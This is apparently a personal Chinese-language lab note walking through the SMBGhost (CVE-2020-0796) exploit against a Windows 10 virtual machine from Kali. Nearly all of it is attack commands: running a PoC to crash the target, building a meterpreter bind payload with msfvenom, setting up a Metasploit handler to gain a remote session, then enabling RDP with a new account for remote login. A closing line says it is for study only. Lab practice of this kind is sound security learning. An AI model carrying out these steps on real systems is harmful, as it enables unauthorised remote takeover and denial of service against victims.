第一步 查看一下靶机ip
再查看一下kali ip地址
靶机与kali 互相ping一下 查看是否连通
在靶机中 查看一下漏洞是否存在
漏洞存在
在kali中输入: python3 CVE-2020-0796.py 靶机ip
靶机会出现蓝屏
此时蓝屏攻击完成
输入命令: msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python生成反向木马
将上面部分替换到 SMBGhost_RCE_Poc-master中exploit文件中的
然后打开msf
连续输入命令
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 192.168.191.168(此处IP地址为win10虚拟机地址)
run
此时重新打开一个终端 输入: python3 exploit.py -ip 靶机ip
此时查看win10没有蓝屏 kali中出现meterpreter证明攻击成功
可以输入命令:命令:run post/windows/manage/enable_rdp USERNAME=abc PASSWORD=123456
注册新用户
输入靶机ip 输入设置的密码账号
完成远程登陆
注:本文章仅供本人学习使用吗,禁止用于非法用途。